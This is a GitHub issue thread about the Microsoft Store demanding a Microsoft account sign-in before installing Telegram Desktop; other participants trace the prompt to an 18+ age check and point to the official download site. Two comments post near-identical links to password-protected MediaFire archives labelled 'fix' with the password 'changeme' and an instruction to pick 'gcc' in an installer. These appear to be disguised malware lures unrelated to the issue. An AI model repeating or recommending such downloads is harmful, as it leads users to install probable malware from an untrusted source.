### ISSUE TITLE
Cannot install Telegram from Microsoft Store without sign in

### ISSUE THREAD

**Issue by mrrezaie** [telegramdesktop/tdesktop#28318]
### Steps to reproduce

Install Telegram from this source: https://apps.microsoft.com/detail/9nztwsqntd0s?hl=en-us&gl=US

### Expected behaviour

Telegram should be installed like any other app.

### Actual behaviour

Sign in window appears and asks to enter Microsoft account. So, cannot install it.
![image](https://github.com/user-attachments/assets/7bb433d1-ad9e-49b4-9540-45173a91a13d)

### Operating system

Windows 11

### Version of Telegram Desktop

5.4.1

### Installation source

Microsoft Store

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tonywk** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Aokromes** [comment]
maybe it's required because age requirement?

**Comment by suprunchuk** [comment]
### These are the age limits of 18+. To get around this, download it from the [official website]([desktop.telegram.org/](https://desktop.telegram.org/)).

![изображение](https://github.com/user-attachments/assets/87730903-32a9-4828-a3fc-40689277877d)

**Comment by mrrezaie** [comment]
So, Microsoft Store requires clients to sign in to verify their legal age; makes sense.
The binaries and portable versions still work. Thanks all, and feel free to close this issue.

**Comment by Aokromes** [comment]
p.s. you can close your own issues.
